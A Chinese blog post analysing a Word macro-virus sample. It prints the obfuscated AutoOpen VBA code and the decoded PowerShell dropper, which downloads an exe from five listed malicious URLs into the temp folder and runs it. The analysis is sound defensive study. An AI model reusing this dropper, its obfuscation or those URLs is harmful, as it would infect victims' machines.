【宏病毒】Word宏病毒简单分析
前言
最近对Office系列宏病毒比较感兴趣,网上找了一个Word样本练练手,宏病毒常用套路一般都是利用PowerShell从服务器上下载PE文件执行,或者数据流中内嵌PE文件借助RTF释放执行。
所以分析宏病毒一般都比较简单,查看VBA代码基本就能知道病毒执行的内容,但是如果代码中的函数、变量、字符串等都经过混淆,分析起来难度就会提高。
详细分析
诱导用户启用宏代码
如果启用内容,宏代码就会执行,我们先看下文档中的数据流。
从"DMSojZquJ"和"wAwJBjJQJ"数据流中DUMP下宏代码,代码经过严重混淆,我们从“AutoOpen”子程序开始分析。
1 'Attribute VB_Name = "wAwJBjJQJ" 2 Function RTUHFOzsK() 3 SSIhYOGKB = BBqMNPjSw 4 bkspY = Mid("zYsMfzXjUkZcWdEGwAVSztCl", 12, 1) 5 pGHmjw = bkspY 6 THZbsWKtF = GApwOicZH 7 VEbORpJELT = Mid("w ULjXwAKAb", 2, 2) 8 siCAq = VEbORpJELT 9 HPhRfOHnm = TOvllapZt 10 jpucp = Mid("dwOtbdJnhnCwfmAwZ qUwQ", 18, 2) 11 aLAikTZzXH = jpucp 12 fqalXfJAK = LCnHkoIcD 13 VuuwVO = Mid("sXFWPUriJfKTpqQrVtOvwpYvPcmRpGfQk", 26, 2) 14 FItfpaapu = VuuwVO 15 OBbLUEjqi = KUOOIoowi 16 FVvtMEG = Mid("HdAFDcAsATviDfWzFFzpaz pXJcWfwf", 23, 2) 17 ajJRwS = FVvtMEG 18 jVrCIfDvl = zLiGcJXbX 19 ZrAYDPTq = Mid("iHOvIROFpzkqDsbh OWUdhlpCiwZMTtrODJzmwsH", 17, 2) 20 jiAGQiQw = ZrAYDPTq 21 SUWWCjAwf = vzuwToFbG 22 jmtkTTkrF = Mid("wYuqqVtGZiJmAXAhOSuPBlkv ZpEnSjLlFJZnGcc", 24, 2) 23 GcmZjTwn = jmtkTTkrF 24 LMtwHYSki = ADrFrhRWc 25 NEiTwbDXjd = Mid("ffAMXNhHaz tNilfGXhcTPPsBKcvGidzFR", 11, 2) 26 RjvFUJZEqEH = NEiTwbDXjd 27 LKTKBJzHw = rAsqBBCLO 28 riLqL = Mid("VYSzUNAfirLhNHuvTkkpqTYI NBTb", 25, 1) 29 wjCNaFw = riLqL 30 iVMwDRCAv = nqFMhzLtQ 31 hCfFzWOivq = Mid("HRJzsdTznHRYYLErvnJSVjftUhUujlLVzZfA", 6, 1) 32 NBOCDBCM = hCfFzWOivq 33 nAKjzzabj = lKCqCjSmA 34 bGAdVi = Mid("RMiPstNpOmmrqQf/wzkf", 16, 1) 35 uFHPYHoifcS = bGAdVi 36 PNGBIBOLR = tiTviHlPK 37 BzbiCjnQqm = Mid("AikEQJtLfHomiYXDjK /fbjKtsWuJLaJzImkOi", 19, 2) 38 IjUTlUqWHO = BzbiCjnQqm 39 EuXMYbiQq = tznZtuwvj 40 rZKmALU = Mid("ijpGMkvqVjf zj", 12, 2) 41 uGUWvBHvsD = rZKmALU 42 RTUHFOzsK = FItfpaapu + NBOCDBCM + IjUTlUqWHO + GcmZjTwn + uFHPYHoifcS + pGHmjw + jiAGQiQw + RjvFUJZEqEH + siCAq + uGUWvBHvsD + ajJRwS + aLAikTZzXH + wjCNaFw 43 End Function 44 Sub AutoOpen() 45 KlsJVlijz 46 End Sub
1 'Attribute VB_Name = "DMSojZquJ" 2 Function KlsJVlijz() 3 KRwZOZiSb = jMiOqzLkc 4 TzurouRwtt = Mid("juDEAMQA2AGIANQA5LfDuHPHXHoVdEQfRC", 3, 15) 5 iKnPNTjHYUN = TzurouRwtt 6 TsfRjzdCc = wGUKHjjwm 7 SAIGYDAjD = Mid("Ur8BJGqnnB5Yulset %cDpiTrLVN%=wers&&set %SuZmiriSa%=JwsADfCTs&&set %KlsJVlijz%=po&&set %qfSAwAXEM%=MrqzTiJDT&&set %PqjuFnVOr%=hell&&set %SqYwAARBW%=VcQFWjpkv&&!%KlsJVlijz%!!ZVnlC9iQvRBa", 15, 159) 8 iBSRmkhEj = SAIGYDAjD 9 XtczUhZho = sGlQtlEVs 10 HdFRsCmu = Mid("zQDZhA3kAOQB7ADEAMQA2AGIAMQAwADUAYgAxADEAMQA6ADEAMQAwAFkANAA2AH4AMQAwADAMuwW3nHiNYrXXhKvuQhjarIPjtM", 8, 65) 11 JZJjMfIbBG = HdFRsCmu 12 PthzvLzhL = GZEufrNor 13 aJFENXB = Mid("2iwApzVhvrZAEkAMQAxADEAegA0ADYAbQAxADEAMAAmADEAMAA4AH4ANAA3AHsAMQAxADYAYgA2ADYAJgAxADAAMgB+ADQANwBZADMAOQB+ADQANgB6ADgAMwBiADEAMQAyAH4AMQAwADgAWQAxADAANQBZADEAMQA2A2kjDuduJutzG4DjSWdJO2f", 12, 153) 14 TjXFztBK = aJFENXB 15 zUYzrCIlv = qfMjGmrTF 16 bEHOc = Mid("LnMwj8vivvwTnBW06hAzADIASQAxADEAMABZADEAMAAxACEAMQAxADkAJgA0ADUAJgAxADEAMQB6ADkAHc", 19, 62) 17 AcOZjKGHd = bEHOc 18 EYzRCmWTI = kzbtDFuEB 19 KtWFTJiUI = Mid("flGAbQ8jdVC6Iw5wGU3kFwCpYhBY7ADkAOAA6ADEAMAA2AG0AMQAwADXlAW41AL0oV", 29, 27) 20 RkSMsXZmbbj = KtWFTJiUI 21 TSBfqKPHC = wXTSDLmIQ 22 iBobiw = Mid("QSw3OIaCMAwAHsAMQAxADAAOgAxADAAMQAmADEAMQA2AGIANAA2ACEAMQAwADAAOgAxADAAMQBiADQANwAmADEAMQA0AEkANAA3AH4ANAA0AHoAMQAwADQAbQAxADEANgBZADEAMQA2ACYAMQAxADIAfgA1ADgAewA0ADcAJgA0ADcAYgAxADAAPzfNmjW9Ai0vDzhN", 10, 174) 23 mvotcU = iBobiw 24 uiSlbYuXn = TwcHoBkXB 25 iaBTlajaUKt = Mid("znY7zKn7hBOVIFz6X%cDpiTrLVN%!!%PqjuFnVOr%! -e LgAgACgAKAB2AEEAUgBpAEEAYgBMAGUAIAAnACoAbQBEAFIAKgAnACkALgBuAGEAbQBFAFsAMwAsADEAMQAsADIAXQAtAEoATwBJAG4AJwAnACkAIAAoACgAJwAzADYAOgAxADEAKvzcsdT8J0IO4j3RzW", 18, 165) 26 XvLAfRK = iaBTlajaUKt 27 EZhmBvkXw = pStPHvpAV 28 wLTmWqsTK = Mid("FfAHsAMQAwADUAYgAxADEANQBZADEAMQA2AH4AMQAxADQAbQTLWzcjuipSiEo", 3, 46) 29 orwEYmMBR = wLTmWqsTK 30 jhqckTXvK = ZriRhfKhi 31 wdpalVvA = Mid("I6iEVXN1GLwpHCz8Ijwm06KbVIuAJgAxADAAMQBJADQANwAhADcAOAB7ADgAOQAhADEAMAA3AEkAOAAzAG0AMQAwADIAJgA0ADcAegA0ADQAJgAxADAANAB6ADEAMQA2AH4AMQAxADYAIQAxADEAMgB7ADUAOAB7A86V", 28, 134) 32 nGmuz = wdpalVvA 33 iHhXBDcFF = tDohRofBp 34 IWIok = Mid("RjADIAJgA0ADMAbQAzADIAYgNG9GurhlHcLP2Co6oWzLFSwmkhv4ldioX", 3, 22) 35 TBNjdzzzh = IWIok 36 KbpOPFkKj = NXkOFaMGs 37 AsoLI = Mid("fSiIEDACYAMwA2AG0AMQAxADQAbQA5ADcAegAxADEAMABiADEAMAAwACYAMQAxADEAegAxADAAOQAhADMAMgBJADYhjj3jjAuppqRGqKrh1T", 7, 82) 38 FRdXUFElRa = AsoLI 39 oLjmAfOds = VsZuljqAF 40 ISYEi = Mid("BVjP8jiqhGziNiDAAOQBiADQANwBJADgAMwBiADEAMAA3ACYANgA1ADoAOAA1AFkANAA3AFkANAA0ACYAMQAwADQAegAxADEANgBiADEAMQA2ACYAMQAxADIAewA1ADgAJgA0ADcAegA0ADcAOgAxADAAOQBtADkANwAmADEAMQA0ACEAMQA3ztDPGPG38AW1vo", 15, 166) 41 fizsQ = ISYEi 42 tUscmqXOh = UfwOUKvrp 43 mnbclQddw = Mid("iPPaU89tkLifQBor34HASQB+AHoAJwAgACkAIAB8ACAAJQB7ACgAIABbAEkAbgB0AF0AJABfAC0AYQBTACAAWwBDAEgAYQByAF0AKQdQsE", 20, 83) 44 cslql = mnbclQddw 45 JXbJzlNOS = GTmEXEUTm 46 GbEiUOiVXw = Mid("ziITYGiIamHpoZHgB+ADgAMwB7ADEAM1t26K9TjQqMzHzEYiu", 16, 16) 47 YhuVfBw = GbEiUOiVXw 48 AMYpPlzuw = tHXOwuqjd 49 nwTYnBKp = Mid("I3DEAMAAx6EkAh4h7va", 3, 7) 50 zwsMjwQJTv = nwTYnBKp 51 djUGOYYRv = vPHtuBYvi 52 WrfmRXK = Mid("Jmcs93jA5rYAMQBJADMAMgB6ADEAMQAwACYAMQAwADEAIQAxADEAOQAmADQANQAmADEAMQAxAH4AOQA4AFkAMQAwADYAYgAxADAAMQAhADkAOQBtADEAMQA2AHoAMwAyAEkAMQAxADQAegA5ADcAegAxADEAMAB6ADEAMAAwACYAMQAxADEAbQAxADAAOQnXaIM1vNmldkDIh7a0o14pDA1", 11, 180) 53 awBiLS = WrfmRXK 54 QTIqMFnTG = urVrNrbqk 55 fwizQHrrKMl = Mid("7ZNCDjkd16F3vJwZADEAMAAxAG0AMQAwADkAYgA0ADYASQA3ADgAWQAxADAAMQA6ADEAMQA2AGIANAA2AGIAOAA3AH4AMQAwADEASQA5ADgAbQA2ADcAYgAxADAAOABJADEAMAA1ADoAMQAwADEAIQAxADEAMAAhARCJQsQwQniZ8zwzvDiFtJcuY", 16, 146) 56 kzLPNEjwRpi = fwizQHrrKMl 57 StzAQwpCi = qzNWqCPaM 58 HYhqTVjz = Mid("NlUNOMQB7ADQANwAhADEAMQA4AHsAOAA3AG0AMQAwADMAOgA0ADcAbQA0ADQAJgAxADAANAAhADEAMQA2AG0AMQAxADYAewAxADEAMgBiADUAOAAhADQANwBiADQANwAmADkANwB6ADEAMAAwAFkAMQAwADkAegAxADAANQA6ADEAMQAwBwOoLDMXi", 6, 172) 59 OXrPUEbnvR = HYhqTVjz 60 UnXOTvRiZ = ZDBQRDQGC 61 aOmzViYRI = Mid("q4zoiVLRd4XVFkAFkAOQA5ACEAOQA3AHoAMQAxADYAfgA5ADkAfgAxADAANABiADEAMgAzACEAMQAxADkAfgAxADEAI71o4", 15, 76) 62 KIwkY = aOmzViYRI 63 jQCKAJbwT = tXBTbniGD 64 mTTdkG = Mid("09MYoVDXOQBiADEAMgAxAH4AOQA4AFkAMQAxADcAewAxADIAMQB+ADEAMAA1AG0AMQAxADAAegAxADAAMwBJADkANwB6ADEAMAAzAHoAMQAwADEAOgAxADEAMAA6ADEAMQA2ACYANAA2AG0AOQA5AFkAMQAxADEAbQAxAMzqwVf3OVmsh", 9, 157) 65 CPOtaunKXFw = mTTdkG 66 MDaCimYPz = cahKFjzjJ 67 jENmKtocosG = Mid("Om2EAOgA5ADkAbQAxADEANgBiADMAMgBiADQANQAhADYANwBJADEAMQAxACYAMQAwADkAbQA3ADkAOgA5ADgAfgAxADAANgBiADEAMAAxAFkAOQA5AEkAMQAxADYAbQAzADIAfgA4ADcAYgA4ADMAJgA5ADkAbQAxA2XiEjooSHSSnosszbWhUJuvY0pR", 4, 159) 68 IAFUul = jENmKtocosG 69 KKmNnWbYG = XGbNmLAEC 70 wwuaTvRloii = Mid("rizBpdohTDQANwBiADQANwAmADEAMAAxAFkAMQAwADAAYgAxADEAMQB7ADEAMQqMh4QsW0tSwB7NpOpYfO", 10, 53) 71 muHlMzvW = wwuaTvRloii 72 cihQlkKwW = mjSSTsdUv 73 NkhKkqUcZzS = Mid("3sTuj9MB568wAFkANgA4AHoAMQAxADEASQAxADEAOQAhADEAMQAwACEAMQAwADgAWQAxADEAMQA6ADkANwBiADEAMAAwAFkANwAwACYAMQAwADUAOgAxADAAOAAhADEAMAAxAEkANAAwAG0AMwA2ACEAMQAxADcAYgAxADEA9u95c", 13, 156) 74 wJLOSQhR = NkhKkqUcZzS 75 QzQDbKjBI = XPoWJBjXF 76 fYzIS = Mid("t8Qv5AEmsBzcKQuRLtPfWP2haoJiOWTEJKWZADUAYgAxADEAMABZADMAMgAmADMANgA6ADEAMQA3AH4AMQAxADQAfgAxADAAOAB7ADEAMQA1ACYANAAxAFkAMQAyADMAYgAxADEANgBJADEAMQA0AH4AMQAyADEAfgz0", 37, 126) 77 bbvLjLAvSJ = fYzIS 78 ctZCDozpo = oFnijRPjE 79 ZXRkXlUKciC = Mid("K3jBHqR0qD19138PwR5IMndSACWcuccASQAxADAAMwB+ADEAMAAxAHoAMQAxADAAfgAxADEANgAmADEAMQA1AEkAMQAwADUAOgAxADEAMABJADkANwBtADzEX", 31, 88) 80 LPwcEG = ZXRkXlUKciC 81 mYCWkjbmj = iPZQlvnBa 82 CaTTBtvHd = Mid("fNzJ623CmpME4BTWDGQSANQAzAHsANQAzAFkANQAxAUXUX", 21, 22) 83 fcjRIRH = CaTTBtvHd 84 WOvbEmVrw = VofWHZwuw 85 JozUMVXQNC = Mid("IUU0INAxAH4AMQAxADUASQAxADEANQA6ADMAMgAmADMANgAmADEAMQAyAGIAOQA3AHsAMQAxADYASQAxADAANAB+ADUAOQAhADkAOAB7ADEAMQA0AGIAMQAwADEAOgA5ADcAWQAxADAANwB7ADUAOQB+ADEAMgA13K5AY50SzPat2", 7, 154) 86 fhXwGUGo = JozUMVXQNC 87 CFJqaQFQZ = PYTsvirtV 88 dnCicIqnDi = Mid("0GrwGzcA1BiqDQ2HsANAAwAHsAMwA5AH4ANAA0AG0AMwA5AEkANAAxACEANQA5AG0AMwA2ACEAMQAxADAAjNwtq8wXSXLbhwY25YY", 16, 67) 89 HczVFWDHVzj = dnCicIqnDi 90 JKUQBsnGw = DMHzTrwkw 91 ckRwBHp = Mid("66II1QkGmQO0bkrwXG7UDHLdjDEAMAAmADkANwB6ADEAMAA5ADoAMQAwADEAegAzMiwv58sW2z8", 26, 39) 92 lbjqdjR = ckRwBHp 93 QjnfWnMGT = cctziOEnj 94 nRJpoij = Mid("JwuGuPV1D5MOLRcplDEAMQAwAGIANAA2AGIAMQAwADAAYgAxADAAFm3RsjWO", 18, 35) 95 SPEOqDL = nRJpoij 96 imEQCTSBE = SPEcvKlaM 97 zGITmmFi = Mid("nXkCVcOVDCIGIANQA0ACEANAAxAHsANQA5AFkAMwA2AG0AMQAxADIAOgA5ADcAewAxADEANgBJADEAMAA0AHoAMwAyAEkANgAxAG0AMwAyAHoAMwA2AFkAMQAwADEAWQAxADEAMAB6ADEAMQA4AFkANQA4AG0AMQAxADYAIQAxADAAMQAmrEv", 12, 167) 98 rBTCHaK = zGITmmFi 99 hdnhDuYKd = FGitvjHSw 100 tkqnlH = Mid("wdHfrVfjbwADcAOgAxADEANwB7ADEAMQA1ACYANAA1AHoAMQAwADIAYgAxADAAOAB6ADEAMAAxAH4AMQAwADUAWQAxADEANQBZADkAOQAhADEAMAA0AH4AMQAwADkAYgA5ADcAYgAxADEAMAB6A11BH3wMoDE4SIlE", 10, 138) 101 ScIOzQwUMHj = tkqnlH 102 szdUNVjur = PzhiLEBWJ 103 wzamU = Mid("whNAB6ADEAMAA4AGIANAA2AG0AOAA0AGIAMQAxADEAfgA4ADMAegAxADEANgBiADEAMQA0AG0AMQAwADUAbQAxADEAMAA6ADEAMAAzACEANAAwAG0ANAAxAHoANAA0AHoAMwAyACEAMwA2AG0A4vOqBUdaq1qn1thchE", 3, 144) 104 MthJuYP = wzamU 105 vziJsrqMu = WYTXVcMta 106 cqwMU = Mid("QjnkEoQif0vzwRUpzj9DcrA5AH4AMQAxADQAWQAxADAANQB+ADEAMQAyACEAMQAxADYAOgAzADIAWQA2ADEAbQAzADIAWQAxADEAMAAhADEAMAAxADoAMQAxADkAYgA0ADUAIQAxADEAMQBU0ntYjnSDmq5K", 23, 121) 107 EbUQjFzQMji = cqwMU 108 jNQSzJDJL = wWvdrZWLV 109 OfVqJ = Mid("TiRt3HNPcKQFXzYzD5zBEbGwegA5ADcAIQAxADAAOQA6ADEAMAAxACYAMwAyAH4ANgAxAFkAMwAyAH4AMwA2AH4AYQhknD2", 25, 64) 110 hpdwFmXNaN = OfVqJ 111 PiHliAaNV = XriEVRdSI 112 IwiDSbtjXNM = Mid("HqijWfnLLYUcpowUZTMNFWFwA2ADEAbQX2fLZc1w1PPk7JVF", 24, 9) 113 LJIEujI = IwiDSbtjXNM 114 sdzZGijtp = zshuBJHwL 115 XNpKBSQp = Mid("kf6rX0J0wo7sLii6ADEAMQAxAH4AMQAxADAAJgA0ADYAWQA3ADcAYgAxADAAMQB7ADEAMQA1AFkAMQAxADUAegJ2BQk9m", 16, 71) 116 LPjrKRijIw = XNpKBSQp 117 SzjQrknfR = jrBdAZQdi 118 jwrGYdkzCNC = Mid("AtDEANABZADEAMAA1ADoAMQAxADIAIQAxADEANgAmADQAN6f6zpUDiWd", 3, 44) 119 EzTYX = jwrGYdkzCNC 120 WqbZFkKbV = ncqVzZGKU 121 CmzXsmGKojc = Mid("rTCDYRjjiCNAA6ADEAMAA1AH4AMQAxADYASQAxADAAMQB6ADQANQA6ADEAMAA0AGIAMQAxADEAIQAxADEANQBJADEAMQA2AEkAMwAyADoAMwA2AFkAOQA1ACYANAA2AEkANgA5ACYAMQAyADAAfgA5ADkAbQAxADAAMQB+ADEAMQAyAH4AMQAxADYAYgAxADAANQBulOPH", 11, 187) 122 QYpwllzTSck = CmzXsmGKojc 123 ZclPlaQAC = oWrIiXalF 124 mAwtjzQ = Mid("dkAOgAxADAAOAA6ADEAMAA1ACEAMQAwADEAOgAxADEAMABZADEAMQA2AFkANAA2uJOYi2zO48HmdXNomG2zwpfcShY3M2zJnYLB", 2, 62) 125 ZbAAifkPrvN = mAwtjzQ 126 jtszGQPAD = bKtbWpErB 127 oWJLO = Mid("i3TbIXnBQGAxADIAMwBZADMANgB+ADEAMQA5ACYAMQAwADEAegA5ADgAegA5ADjWE", 11, 52) 128 DGLkaA = oWJLO 129 zHFAIEhVF = dfwTvMTXR 130 EKYFiRhEXFw = Mid("KnNUzlTmADEAMAAwADoAMQAxADEAJgAxADAAOQA6ADQANgB7ADEAMQAwADoAMQAwADEAegAxADIAMABJADEAMQA2AH4ANAAwAG0ANAA5AFkANAA0AFkAMwAyACYANQA0AG00PriiWvtTcTzBJm2tJ1j", 8, 124) 131 zSGEI = EKYFiRhEXFw 132 cZWVzlXoq = JMzCDmWdd 133 SFdjwWp = Mid("zPHvKMQAxADIASQA5ADcAWQAxADEANgBiADEAMAA0ACEANAAxACEANQA5AHoAOAAzADoAMQAxADYASQA5ADcASQAxADEANAA6ADEAMQA2AHoANAA1AGIAOAAwAFkAMQAxADQAYgAxADEAMQAhADkAOQBJADEAMA9pqIbizJibVUjF5C", 6, 154) 134 OkBajT = SFdjwWp 135 ziknRkKlU = EIPhIwXbR 136 DcABZPAtp = Mid("Ph4HGzYkfOCGqZiwdDGa3TvRI46jLtBiSAzADkAIQA0ADYAIQAxADAAMQA6ADEAMgAwAHsAMQAwADEAJgAzADkAfgA1ADkAfgAxADAAMgA6ADEAMQAxACEAMQAxADQAegAxADAAMQAmADkANwB+ADkAOQA6ADEAMAA0AGIANAAwACYAMwA2AG0AMQAxADcAIQAxADEANABZADEAMAA4AEkAMwAyAH4AMQAwPn59", 34, 194) 137 CWMpLVkSS = DcABZPAtp 138 ibHUdTOYI = FabLwRiUp 139 cBUrWQJBDX = Mid("XmOJgAxADAAOAA6ADEAMQA1AGIzN3QzjhpYQj5G3IKoCPMI", 4, 23) 140 lcPiAkbq = cBUrWQJBDX 141 hpIlKOQSj = bbEBfbVrB 142 MvpXHXC = Mid("z5nzXvB8SLdaMXOJ2AMwAyAEkANgAxACYAMwAyAGIAMwA5ACYAMQAwADQAWQAxADEANgB+ADEAMQA2AEkAMQAxADIAJgA1ADgAYgA0ADcAJgA0ADcAbQA5ADSC", 18, 103) 143 HnZjzd = MvpXHXC 144 WiEQYtbFL = stLzwnJqm 145 vajVOP = Mid("RGKthsDsJzwtA5ADcAYgAxADAAMwBJADEAMAAxAHsANQA5AFkAMQAyADUAfgAxADIANQAnAC4AcwBQAEwAaQBUACgAIAAnAFkAJgB7AG0AOgBiACE8UDpdPzMzSYXt3P57", 13, 101) 146 GzjkYUBnqXG = vajVOP 147 JtQsEKnnw = DEvzqFPLp 148 kEROiFMIq = Mid("j4Ja9dOW453qN2YADEAMAA5AEkZA0c3hwNX3JwzjtcQXbvF6aP", 16, 11) 149 icAYwsLVpUA = kEROiFMIq 150 kQQOJFDXZ = UddQropLw 151 irUIcwRD = Mid("Au1EHs6ti0AmADUAOQB6ADMANgAmADEAMQA3AHsAMQAxADQA7Wj9C5z0PqNsb2IoN9LTqN", 11, 38) 152 bapZdDJB = irUIcwRD 153 kdaudlwYB = PtDFhmwZZ 154 iFmWVaPu = Mid("AX2dCwbGzBwRzR0B9ACAAKQAtAEoATwBpAG4AJwAnACAAKQA=57cAXn5i8m8q2JvPWDXAo", 16, 34) 155 KbFniuHlZAr = iFmWVaPu 156 WujLpjlSJ = TnMGKiHih 157 hfcbdZkXOQ = Mid("MofaM2kwYCF3hI3pREPq5wADEAWQA5ADkAhBAoZ3SX", 22, 13) 158 OWGLMOBo = hfcbdZkXOQ 159 OpniRlEni = VOwqRSPSQ 160 zXXPDkaDCDf = Mid("UMBH8K03MAPWjNr4AA0AHsAMQAwADEAYgAxADAAOAB+ADEAMAA4AGIANQA5ACYAMwA2ACEAMQAxADkAegAxADAAMQBZADkAOAAmADkAOQB6ADEAMAA4AEkAMQAwADUAewAxADAAMQBZADEAMQAwADoAMQAxADYAWQAzADIAejavu33", 17, 152) 161 iCUMSYusIv = zXXPDkaDCDf 162 OZouIKbdk = oJiYwCEkj 163 pDDDLci = Mid("5l8w3MoVMQAxADQAOgA5ADcAegAxADEAMAArVwfzX20rok3a", 9, 27) 164 NwSKajzAjmw = pDDDLci 165 lrczHCBPD = NcVurrNsF 166 cYFmodmUji = Mid("Xr8i8vwXK63tEGUAFM4fpIlA5ADcASQAxADEANgB7ADEAMAA1AGIAMQAwADEAIQAxADAANwBtADkANwBZADEAMQAwACYAMQAxADYASQAxADEAMQBiADEAMQAxAG0AMQAxADQAWQA5ADkAewAxADAAOAB+Ar2UuHBTQ", 24, 131) 167 kKRBFkTYOSq = cYFmodmUji 168 tThcDoAPi = vzQtlhidb 169 FPmzKLZZjn = Mid("UZV2SLzYBcmKjhjOAB7ADEAMAA2ADoAMQAuW61n", 16, 19) 170 bYcfSuOhsf = FPmzKLZZjn 171 nRRltsHOB = PtSrLGzLR 172 KftEZiGv = Mid("ZOQB6ADEAMQA1AG0AOQGqcXPjVTGBVwHur", 2, 18) 173 PcapUM = KftEZiGv 174 CIoowrYFS = nUqoLNQZb 175 CfjsS = Mid("pZPkhRPZtdoEjR3UWRwYAMQAxADIAWQAzADIAegA0ADMAegAzADIAbQAzADkASQA5ADIAegAzADkAIQAzADIAYgA0ADMAOgAzADIAJgAzADYAYgAxAoA", 21, 94) 176 sbpNlLMLdC = CfjsS 177 nHaoVpmlW = MEmKwaQjV 178 haGppvzwpLm = Mid("MWhOm3Q1WQAxADEANgB+ADMAMgB7ADgAMwBJADEAMgAxAHsAMQAxADUASQAxADEANgB7v", 9, 59) 179 wZkHuAqmza = haGppvzwpLm 180 Shell$ RTUHFOzsK + Chr(34) + iBSRmkhEj + XvLAfRK + PcapUM + EbUQjFzQMji + RkSMsXZmbbj + IAFUul + EzTYX + YhuVfBw + iCUMSYusIv + LJIEujI + AcOZjKGHd + bYcfSuOhsf + OWGLMOBo + wZkHuAqmza + kzLPNEjwRpi + iKnPNTjHYUN + FRdXUFElRa + awBiLS + bapZdDJB + lcPiAkbq + HnZjzd + LPwcEG + JZJjMfIbBG + nGmuz + muHlMzvW + mvotcU + CPOtaunKXFw + fizsQ + ScIOzQwUMHj + SPEOqDL + OXrPUEbnvR + orwEYmMBR + kKRBFkTYOSq + zwsMjwQJTv + TjXFztBK + HczVFWDHVzj + hpdwFmXNaN + NwSKajzAjmw + zSGEI + fcjRIRH + rBTCHaK + icAYwsLVpUA + sbpNlLMLdC + lbjqdjR + TBNjdzzzh + CWMpLVkSS + bbvLjLAvSJ + DGLkaA + ZbAAifkPrvN + wJLOSQhR + MthJuYP + OkBajT + fhXwGUGo + KIwkY + QYpwllzTSck + LPjrKRijIw + GzjkYUBnqXG + cslql + KbFniuHlZAr, 0 181 End Function
子程序中首先调用了"DMSojZquJ"模块的"KlsJVlijz"函数,函数代码经过严重混淆,但是通过函数结尾的“Shell”关键字我们猜测病毒执行了某个程序或命令行。
1 '使用参数0来隐藏执行程序或命令行 2 Shell$ RTUHFOzsK + Chr(34) + iBSRmkhEj + XvLAfRK + PcapUM + EbUQjFzQMji + RkSMsXZmbbj + IAFUul + EzTYX + YhuVfBw + iCUMSYusIv + LJIEujI + AcOZjKGHd + bYcfSuOhsf + OWGLMOBo + wZkHuAqmza + kzLPNEjwRpi + iKnPNTjHYUN + FRdXUFElRa + awBiLS + bapZdDJB + lcPiAkbq + HnZjzd + LPwcEG + JZJjMfIbBG + nGmuz + muHlMzvW + mvotcU + CPOtaunKXFw + fizsQ + ScIOzQwUMHj + SPEOqDL + OXrPUEbnvR + orwEYmMBR + kKRBFkTYOSq + zwsMjwQJTv + TjXFztBK + HczVFWDHVzj + hpdwFmXNaN + NwSKajzAjmw + zSGEI + fcjRIRH + rBTCHaK + icAYwsLVpUA + sbpNlLMLdC + lbjqdjR + TBNjdzzzh + CWMpLVkSS + bbvLjLAvSJ + DGLkaA + ZbAAifkPrvN + wJLOSQhR + MthJuYP + OkBajT + fhXwGUGo + KIwkY + QYpwllzTSck + LPjrKRijIw + GzjkYUBnqXG + cslql + KbFniuHlZAr, 0
我们修改代码,使用MsgBox函数输出执行内容。
发现是通过Cmd调用PowerShell执行命令。
1 '拼接“powershell”字符串 2 set %cDpiTrLVN%=wers '赋值“wers” 3 &&set %SuZmiriSa%=JwsADfCTs '混淆 4 &&set %KlsJVlijz%=po '赋值“po” 5 &&set %qfSAwAXEM%=MrqzTiJDT '混淆 6 &&set %PqjuFnVOr%=hell '赋值“hell” 7 &&set %SqYwAARBW%=VcQFWjpkv '混淆 8 &&!%KlsJVlijz%! '拼接“po” 9 !%cDpiTrLVN%! '拼接“wers” 10 !%PqjuFnVOr%! '拼接“hell”
Base64解密PowerShell命令。
解码后的数据同样经过混淆,解混淆的方法是去掉无用字符串,将十进制数值转换为对应的ASCII字符。
因为第一行的3、11、2转换为ASCII字符后不能显示,所以从第二行的36开始,以此类推。
代码通过“DownloadFile”从指定服务器下载exe文件,以随机数作为exe文件名,将文件保存到系统temp目录下。然后使用“Start-Process”执行exe文件。
1 #转码后的PowerShell命令 2 $wscript = new-object -ComObject WScript.Shell; 3 $webclient = new-object System.Net.WebClient; 4 $random = new-object random; 5 $urls = 'http://agentsinaction.de/NYkSf/,http://edonnet.de/r/,http://mybuyingagent.com/SkAU/,http://markus-fleischmann.de/vWg/,http://administratiekantoorcleo.nl/tBf/'.Split(','); 6 $name = $random.next(1, 65536); 7 $path = $env:temp + '\' + $name + '.exe'; 8 foreach($url in $urls){ 9 try{ 10 $webclient.DownloadFile($url.ToString(), $path); 11 Start-Process $path;break; 12 } 13 catch{write-host $_.Exception.Message;}
分析完代码,“Alt+F11”打开宏代码,修改shell显示参数=1,调试看下运行结果。可能是时间太久服务器已经失效,代码并未执行成功。
总结
宏病毒基本的分析步骤就是这些,后续对PE样本的分析和平时都是一样的,唯一不同的就是病毒会使用各种混淆来阻止分析,另外自己也比较菜,这篇文章就算是一个好的开端,等以后遇到其它样本在好好分析总结吧。
